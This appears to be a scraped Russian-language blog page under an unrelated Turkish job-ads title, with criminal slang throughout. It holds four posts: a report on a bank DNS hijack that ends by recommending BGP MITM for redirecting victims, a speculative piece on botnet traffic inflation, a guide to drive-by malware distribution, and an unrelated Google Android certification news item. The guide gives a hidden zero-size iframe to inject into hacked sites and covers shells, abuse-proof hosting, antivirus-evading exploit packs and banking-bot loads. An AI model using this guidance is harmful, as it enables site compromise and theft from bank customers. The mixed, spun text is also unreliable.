İstanbul'da iş ilanları

Author: Lallora

  • Дроповод перенаправлял холдеров на свою площадку процессинга при помощи подмены DNS записей

    Дроповод перенаправлял холдеров на свою площадку процессинга при помощи подмены DNS записей

    Американский банк Bank of Wisconsin Dells (Community Bank of Portage) предупредил своих клиентов о том, что один проверенный дроповод получил полный доступ к управлению доменными именами официальных сайтов этого кредитного учреждения, после чего начал перенаправлять их посетителей на свою площадку процессинга с подставной страницей авторизации холдера.

    схема работы процессинга дроповода с подмена DNS записей на площадке

    Директор по информационной безопасности Bank of Wisconsin Dells Кристина Ли провела встречу с представителями мундиров, в ходе которой сообщила, что дроповод перенаправляет запросы страниц dellsbank.com и commbankportage.com, пытаясь таким образом вынудить их посетителей ввести данные авторизации к банковским счетам на своей площадке процессинга.

    Как сообщается, меры защиты, используемые банком при осуществлении онлайн-транзакций, не позволили дроповоду получить доступ к аккаунтам клиентов, однако в соответствии с законодательством финансовая организация в любом случае должна была проинформировать об инциденте правоохранительные органы.

    Одновременно с этим всем пользователям системы интернет-банкинга были разосланы соответствующие предупреждения, призывающие их не вводить логины к своим счетам на подозрительных веб-страницах.

    В настоящее время по данному инциденту начато расследование, однако руководство местной полиции отмечает, что её ресурсы в этой области весьма ограничены, в особенности если речь идет об атаке или скаме через процессинг из-за рубежа.


    Как рассказали наши эксперты, перенаправление трафика на площадку процессинга всё же лучше выполнять при помощи реализации сценариев bgp mitm.

  • Как ботнеты помогают провайдерам

    Как ботнеты помогают провайдерам

    Трафик, его направление и величина являются аргументами в торговле провайдеров между собой. Кто кому должен платить за подключение, сколько платить, стоит ли договариваться о беcплатном обмене трафиком (пиринге) и вообще, пускать ли оператора на узел обмена IX (эксчендж) – все эти вопросы решаются с большой оглядкой на статистику его трафика за последнюю пару месяцев. Таким образом, статистика начинает стоить денег.

    утечки трафика и маршрутов неизбежны

     

    Подделать статистические показатели крайне сложно, но их можно накрутить. Послать в нужном направлении триллиончик “тяжёлых” пингов – это не метод. Грубая односторонняя накрутка трафика выявляется элементарно.

    Лучшим инструментом для создания трафика, похожего на настоящий, являются ботнеты. Агент ботнета легко может имитировать действия пользователя по просмотру веб-страницы, скачиванию mp3, постингу картинки, даже просмотру видео во флеш-плеере.

    При этом владелец ботнета имеет возможности задействовать узлы из определённых стран и местностей, включать их в заданные периоды времени. Статистика получится гладенькая и натуралистичная. 

    У меня пока нет свидетельств об использовании ботнетов в таком качестве. Но ваш покорный слуга уверен, что оно имело место или должно состояться в скором времени. Буду признателен, если уважаемые коллеги поделятся своими наблюдениями и подозрениями на этот счёт.

    Зная некоторые особенности зомби-сетей или захватив “языка”, можно попробовать выявить такие накрутки.

  • Кому и зачем нужен iFrame трафик и причём тут дроповоды и обнал

    Кому и зачем нужен iFrame трафик и причём тут дроповоды и обнал



    Трафик – на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф – это смешаный трафик нескольких стран стразу.
    как конвертировать трафик в просмотры AdSense
    Для чего нужен трафик?
    В своей основе iFrame трафик реальные дроповоды используют в своих схемах для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

    Где взять трафик?
    Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок…

    Чтобы иметь трафик дроповодам darkmoney нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме – это самый надёжный вариант.

    Для чего мне нужны FTP и Shell и что мне с ними делать?
    iFrame – это код HTML внутри страницы. С помощью iFrame дроповод darkmoney может вставлять один HTML документ в другой! Проще говоря, iFrame – это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

    Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
    Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:

    <iframe src=”http://site.ru/sploit.php” width=”0″ height=”0″ frameborder=”0″></iframe>

    где:

    http://site.ru/sploit.php – это сайт на который пользователи site.ru будут заходить одновременно
    width=”0″ длина равна 0
    height=”0″ высота равна 0
    frameborder=”0″ граница фрейма равна 0

    Что делать с Iframe?
    Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

    Что нужно для продажи трафика?
    Есть такая штука, как TDS – Traffic Direct System, – это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

    Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

    В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
    Ну вот и всё, теперь поговорим про загрузки.

    Что же такое эти загрузки?
    Загрузки – это загрузка и запуск файла на компьютере клиента банка или простого лоха, – один из самых распространённых методов распространения банковских ботов в сети Интернет.

    Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов…

    Загрузки – это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

    Что нам нужно для того чтобы делать загрузки?
    Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

    Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

    Теперь про связку сплоитов
    Exploit – это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
    А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

    Что же такое пробив связки?
    Пробив – это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился – тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

    Как делать загрузки?
    Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site.com/svjzka.php – значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

  • Google начал блокировку своих служб для несертифицированных устройств

    Google начал блокировку своих служб для несертифицированных устройств

    XDA Developers сообщает, что компания Google начала отказывать несертифицированным устройствам в доступе к своим приложениям и сервисам.

    Дело в том, что исходный код Android Open Source Project является бесплатным и опенсорсным, фактически, им могут пользоваться все желающие. Однако сервисы и официальные приложения Google (такие как Play Store, Gmail, Google Maps и так далее) «в комплект» не входят и свободными не являются. Google лицензирует эти приложения для производителей устройств, которые, в свою очередь, в ответ должны выполнить ряд требований компании. В частности, коллекция дефолтных приложений для Android должна поставляться только вся и полностью, приложения соответствовать определенным условиям размещения, а также само устройство, на которое приложения устанавливаются, должно соответствовать длинному списку требований к совместимости.

    Производители, чьи гаджеты не прошли такую сертификацию, не имеют права использовать торговую марку Android и, по сути, работают с форками ОС Google. Наиболее известным форком такого рода можно назвать устройства компании Amazon (в частности, серию Kindle Fire). К тому же большинство китайских устройств тоже работают на базе форков Android.

    И хотя официально приложения Google могут распространятся лишь в предустановленном на устройство виде, прямо «из коробки», они так же свободно доступны в сети, на множестве форумов, сайтах кастомных прошивок, сторонних каталогах приложений и так далее. Таким образом, при желании любой пользователь и даже производитель, не прошедший «сертификацию», может установить приложения Google на свой гаджет.

    По данным XDA Developers, с середины марта 2018 года разработчики Google начали бороться с таким поведением более агрессивно. Теперь попытка установить официальные приложения Google на несертифицированное устройство оборачивается ошибкой. Google попросту не позволяет залогиниться в свои сервисы во время установки, сообщая, что данное устройство не проходило сертификацию.

    Вариантов решения проблемы пользователю предлагают немного, в сущности, рядовому юзеру остается лишь жаловаться производителю. Впрочем, как можно увидеть на иллюстрации выше, в самом низу сообщения все же есть опция для пользователей кастомных Android-прошивок. Google предлагает зарегистрировать такие устройства по адресу g.co/androiddeviceregistration, привязав их к своему аккаунту Google. Правда для этого потребуется ввести уникальный идентификатор (Android ID) гаджета, что, к сожалению, может стать проблемой для неподготовленных пользователей. Android ID устанавливается при первом запуске устройства (и генерируется заново после сброса к заводским настройкам), представлен в шестнадцатеричном (hex) виде, и увидеть его можно лишь при помощи специальных утилит.

    Еще одной проблемой может стать тот факт, что вручную Google позволяет зарегистрировать максимум 100 устройств на одного пользователя. То есть любители экспериментировать, менять прошивки и устройства, могут исчерпать этот лимит и в итоге останутся без официальных приложений Google.